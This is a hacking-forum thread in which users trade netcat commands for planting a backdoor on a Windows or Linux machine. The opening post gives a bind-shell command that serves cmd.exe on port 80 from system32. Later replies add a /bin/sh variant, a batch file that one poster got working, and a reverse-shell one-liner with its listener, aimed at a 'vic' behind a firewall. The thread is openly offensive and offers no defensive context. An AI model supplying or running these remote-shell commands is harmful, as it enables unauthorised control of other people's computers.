Creating a backdoor with nc and connecting to it - System Security

undead

Creating a backdoor with nc and connecting to it

First you must download NetCat from the following website:
http://www.downloadnetcat.com

After you download netcat place it to system32.

Now open command line and write this command inside:

nc -v -L -p 80 -e cmd.exe

-v is verbose
-L is to make it to listen
-p is the port you want to listen to.
-e is the program you want to launch when the connection is established

Now on the attacking computer open command line and write this command:

nc -v <IP of the target> 80

Now you have access to the computer.

chroniccommand

Never tried it before. I'm gonna try it later. Thanks for the guide.

EDIT: It says -L is not an option for netcat(On Linux)

undead

It's for windows.

chroniccommand

said:

It's for windows.

Damn. If I put it in the system32 of a windows machine and connect via Linux machine would it work?

undead

Hm.. I didn't try it. Try it and tell us. :) But if you want for linux maybe that should work: nc -v -l -p 80 -e /bin/sh

Xin

The windows version is bad, use it on linux, also you have to portforward for this to work

chroniccommand

said:

Hm.. I didn't try it. Try it and tell us. :) But if you want for linux maybe that should work: nc -v -l -p 80 -e /bin/sh

I tried that exact command but it said -l is not a parameter for netcat.

undead

are you sure you tried "l"? "L" with "l" is diffirent.

chroniccommand

said:

are you sure you tried "l"? "L" with "l" is diffirent.

Yep tried lowercase and uppercase.
Input:

~$ nc -v -L -p 80 -e /bin/sh

Output:


nc&#58; invalid option -- 'L'
usage&#58; nc &#91;-46DdhklnrStUuvzC&#93; &#91;-i interval&#93; &#91;-P proxy_username&#93; &#91;-p source_port&#93;
	  &#91;-s source_ip_address&#93; &#91;-T ToS&#93; &#91;-w timeout&#93; &#91;-X proxy_protocol&#93;
	  &#91;-x proxy_address&#91;&#58;port&#93;&#93; &#91;hostname&#93; &#91;port&#91;s&#93;&#93;

Edit: I've been messing around with it and researching it. I've found that some people got it to work on Unix machines by using this command:

nc -nvv -l -p -e /bin/sh &lt;port of choice&gt;

But when I do it on my machine I get an output saying cannot use -p and -l

I'm going to continue seeing what I can do with it.

Edit2: Heres what I got to work(On windows). I put netcat in system32, and ran this command in a batch file:

nc -l -p 1337 -e cmd&#46;exe

After that I went onto my Linux machine and just connected via netcat and it opened a connection to the command prompt on the windows system. I'm going to continue trying to get it to work on Linux. I'm trying to attack it to /bin/sh but so far I cant get it to work because of some errors saying I cant use -l and -p together etc.

alix10

wtf its that easy, im going to try it

undead

Did you try it? Did it work for you?

dR.sqL

Not working for me mate.. ! :(

zer0day

Like an earlier poster said, if your vic doesn't have their port forwarded you won't be able to connect. Thats the benefits of other tools that have reverse connection. Windows egress lets it all out, but ingress is filtered.

Xin

Yeah you can use this for webservers on open ports but i would just use reverse shell, that means you open your port and they connect to you

Sh3llc0d3

said:

NOT WORKING :( how to do this :(

It should work. I see no problems with the commands.

Where are you getting stuck?

m0rph

netcat can do reverse shells. granted it has to be on the victim machine:


nc -nv &lt;your ip&gt; &lt;your port&gt; -e (cmd, or shell command)

you have to listen with:


nc -lvnp &lt;desired port&gt;

gizmodo

have you guys check cryptcat? http://sourceforge.net/projects/cryptcat/

nu11byte

You also need to portforward for this to work. If you don't port forward, it will just listen and never connect.

Howdy, Stranger!

Top Posters

Who's Online (3)